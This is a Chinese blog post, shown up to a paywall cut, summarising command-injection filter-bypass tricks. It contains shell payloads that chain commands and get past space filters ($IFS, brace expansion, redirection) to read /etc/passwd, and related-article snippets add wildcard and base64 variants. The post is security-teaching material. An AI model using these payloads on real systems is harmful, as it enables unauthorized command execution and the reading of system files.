命令注入绕过技巧总结

已于 2022-04-04 23:54:02 修改
阅读量3.4k 收藏 3
点赞数 1
分类专栏: web安全 文章标签: 安全
于 2020-05-05 11:18:39 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_41082546/article/details/105929679
版权
本文总结了命令注入的绕过技巧,包括基本命令、链接命令、过滤器绕过策略如无空格绕过、十六进制编码和黑名单绕过,以及基于时间与DNS的数据渗透方法。还提到了DNSBin工具的使用,用于测试DNS数据渗透。
摘要由CSDN通过智能技术生成

命令注入绕过技巧总结

命令注入是一个安全漏洞,它使攻击者可以在易受攻击的应用程序中执行任意命令。

基本命令

root@micr067:~# cat /etc/passwd
root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin
bin:x:2:2:bin:/bin:/usr/sbin/nologin
sys:x:3:3:sys:/dev:/usr/sbin/nologin

链接命令

demo; ls
cat demo.txt && ls
cat demo.txt | ls
cat demo || ls    # 当前面的命令执行失败后面的命令才会执行

在命令内

cat demo.txt `cat /etc/passwd`
cat demo.txt $(cat /etc/passwd)

过滤器绕过

无空格绕过

仅适用于Linux。

root@micr067:/tmp# cat</etc/passwd
root:x:0:0:root:/root:/bin/bash

root@micr067:/tmp# {cat,/etc/passwd}
root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin

root@micr067:/tmp# IFS=,;`cat<<<cat,</etc/passwd`
root:x:0:0:root:/root:/bin/bash

root@micr067:/tmp# cat$IFS/etc/passwd
root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin

root@micr067:/tmp# echo${IFS}"RCE"${IFS}&&cat${IFS}/etc/passwd
RCE
root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin
最低0.47元/天 解锁文章
Micr067
关注
  • 1
    点赞
  • 3
    收藏
    觉得还不错? 一键收藏
  • 打赏
    打赏
  • 0
    评论
专栏目录
命令注入_命令注入绕过方式总结 (20210111学习笔记)
weixin_39777464的博客
01-12 293
前言命令注入是web中常见的漏洞之一,由于web应用程序未对用户提交的数据做严格的过滤,导致用户输入可以直接被linux或windows系统当成命令执行,一般都会造成严重的危害。常用符号分号(;)多条语句顺序执行时的分割符号。1cmd1;cmd2管道符(|)cmd1命令的输出,作为下一条命令cmd2的参数。1cmd1|cmd2and(&&)与命令,cmd1成功则执行cmd...
SQL注入绕过实战案例
08-31
通过实践,我们可以学习到如何利用不同技巧绕过常见的防御机制,如输入过滤、预编译语句、参数化查询等。 为了防御SQL注入,开发者应遵循以下最佳实践: 1. 使用预编译语句(如PHP的PDO或MySQLi的prepare()函数),...
命令注入绕过方式总结
cainsoftware的博客
10-09 1682
前言 命令注入是web中常见的漏洞之一,由于web应用程序未对用户提交的数据做严格的过滤,导致用户输入可以直接被linux或windows系统当成命令执行,一般都会造成严重的危害。 常用符号 分号(;) 多条语句顺序执行时的分割符号。 cmd1;cmd2 管道符(|) cmd1命令的输出,作为下一条命令cmd2的参数。 cmd1|cmd2 and(&&) 与命令,cmd1成功则执行cmd2,cmd1失败则不执行cmd2 cmd1 && cmd2
红帽Redhat—Linux文本处理
m0_52812401的博客
12-30 749
提示:文章写完后,目录可以自动生成,如何生成可参考右边的帮助文档 文章目录前言一、pandas是什么?二、使用步骤1.引入库2.读入数据总结 前言 提示:这里可以添加本文要记录的大概内容: 例如:随着人工智能的不断发展,机器学习这门技术也越来越重要,很多人都开启了学习机器学习,本文就介绍了机器学习的基础内容。 提示:以下是本篇文章正文内容,下面案例可供参考 一、pandas是什么? 示例:pandas 是基于NumPy 的一种工具,该工具是为了解决数据分析任务而创建的。 二、使用步骤 1.引入库 代码
Linux环境下命令注入————WAF绕过技巧
Fly_鹏程万里
04-15 5515
命令注入之Web应用防火墙绕过技巧本文中讲述的绕过防火墙技巧,只适用于linux系统命令注入环境中,大家就不要纠结于这些绕过技巧不适用于mysql、window什么的。使用通配符绕过防火墙规则例如使用 /???/c?t /?t?/p??swd 来代替 cat /etc/passwd/???/c?t /?t?/p??swd 其实匹配到的是 /bash/cat /etc/passwd有时候我们想用ne...
命令注入以及常见绕过方式
Manuffer的博客
10-11 3642
命令注入及常见绕过方式
[CTF技巧]命令注入绕过总结
3tefanie丶zhou的博客
07-08 3491
命令分隔符 cat /etc/passwd;ls 分号 ; cmd1;cmd2(多条语句顺序执行) cat /etc/passwd && ls and && cmd1&&cmd2 与命令,cmd1成功则执行cmd2,cmd1失败则不执行cmd2 cat etc || ls or || cmd1 || cmd2 cmd1执行失败则执行cmd2,若cmd1执行成功则不执行cmd2 管道符 | | 管道符 管道符”|“
MySQL注入绕开过滤的技巧总结
09-09
以下是一些常见的MySQL注入绕过过滤的策略: 1. **空格替代**: - 如果空格被过滤,可以使用括号`()`来代替空格。例如,原本的`select * from users where id=1;`可以改写为`select * from(users)where id=1;`,...
那些年我们绕过的WAF
05-07
标题中的“那些年我们绕过的WAF”暗示了本文将探讨如何在面对Web应用程序防火墙(WAF)时,采用各种技巧和方法来规避其安全防护。WAF是一种专门用于保护Web应用程序免受常见攻击(如SQL注入、跨站脚本攻击等)的设备...
struts2绕过waf读写文件及另类方式执行命令1
08-03
攻击者通过OGNL注入和利用Struts2的内部机制,可以绕过WAF的关键字过滤,执行任意命令或进行文件操作。因此,对于开发人员来说,确保及时更新Struts2到最新版本,同时进行严格的输入验证和WAF配置至关重要,以防止这...
Python网络安全项目开发实战_防命令注入_编程案例解析实例详解课程教程.pdf
04-27
`,但攻击者可以通过使用`&`来替代`&&`,或者利用其他命令执行技巧绕过过滤。例如,`127.0.0.1 & cat /etc/issue`。 在High级别,尽管过滤更加严格,但仍然存在漏洞。在这个例子中,服务器忽略了对管道符`|`的过滤...
Linux/CTF命令注入绕过
Mr_Shiyang的博客
08-15 4310
第一题:题目链接 打开题目直接给了源码, <?php $str=""; if(!empty($_GET)){ $str=$_GET["calc"]; } ?> 以及 <?php echo "result:".shell_exec("echo $str | bc"); ?> 可以看出其没有对用户输入的内容进行一定过滤直接传给shell_exec函数执行。所以存在命令行漏洞。 这里只要用;或者&&将shell_exec中的echo给截断即可执行我们想要执
CTF-命令注入绕过技巧总结
最新发布
键盘的起始页
04-10 346
执行顺序:输出base64编码内容------>base64解码其编码内容------>执行bash命令。cmd1 || cmd2 cmd1执行失败则执行cmd2,若cmd1执行成功则不执行cmd2。注意:反引号``和$()用来表示命令执行,被这两种方式包含的字符串都会被当作命令优先执行。cmd1&&cmd2 与命令,cmd1成功则执行cmd2,cmd1失败则不执行cmd2。管道符”|“左边的命令的输出会作为管道符”|“右边命令的输入。核心:利用管道符”|“将左边命令的输入作为右边命令的输出。
【WEB】命令注入(基础知识讲解及绕过姿势)(更新中)
weixin_45844670的博客
08-24 1119
通过web程序,在服务器上拼接系统命令。基础知识命令注入的条件:PHP执行系统命令的函数:&,&&,|,|| 的区别:漏洞利用服务器进行参数过滤空格代替截断符号利用base编码绕过过滤了敏感命令对比和文件上传漏洞对比和远程代码执行对比工具的使用防护白名单保护黑名单保护 基础知识 正常情况下,是ping一个IP地址。确定调用系统命令 确定可控字段 确定命令语句,&&可以连接两条Windows命令 命令注入的条件: web应用程序调用可执行系统命令的函数 执行系统命令
渗透测试-命令执行注入
lza20001103的博客
07-20 2918
渗透测试-命令执行注入
【网络安全---Linux命令绕过】Linux下命令执行绕过技巧(很全,很实用)
m0_67844671的博客
09-24 2266
Linux下命令执行绕过方式和思路;网站上可能有一些能执行系统命令的地方,但是对一些关键字和空格等做了一些防护,如何绕过就成了一个难题,这篇文章分享一些Linux下的命令执行绕过技巧以及思路,不如说空格的绕过,关键字绕过,编码绕过等等;
web安全命令注入
weixin_54584489的博客
04-13 707
命令注入漏洞即web应用程序使用了可以操控相关系统命令的功能,又没有对用户输入进行过滤,导致攻击者可以通过拼接输入而执行系统命令
Linux下防止注入攻击,应该过滤哪些字符?
sinat_33461431的博客
03-13 1107
重定向符号(>、>>、
命令执行漏洞的利用以及绕过方式
cosmoslin的博客
09-14 1925
命令执行漏洞的利用以及绕过方式 1 preg_match()函数 preg_match 函数用于执行一个正则表达式匹配。 int preg_match ( string $pattern , string $subject [, array &$matches [, int $flags = 0 [, int $offset = 0 ]]] ) 参数 说明 $pattern 要搜索的模式,字符串形式 $subject 要搜索检测的目标字符串 $matches 如果提供了参数
CTF挑战:绕过过滤执行命令技巧解析
"ctfshow-web41~60-WP 是一系列关于网络安全竞赛(CTF,Capture The Flag)中的Web安全题目,主要涉及命令注入漏洞的利用与绕过技巧。这些题目逐步增加难度,帮助参赛者提升在实战中发现和解决安全问题的能力。" 在...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

Micr067

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值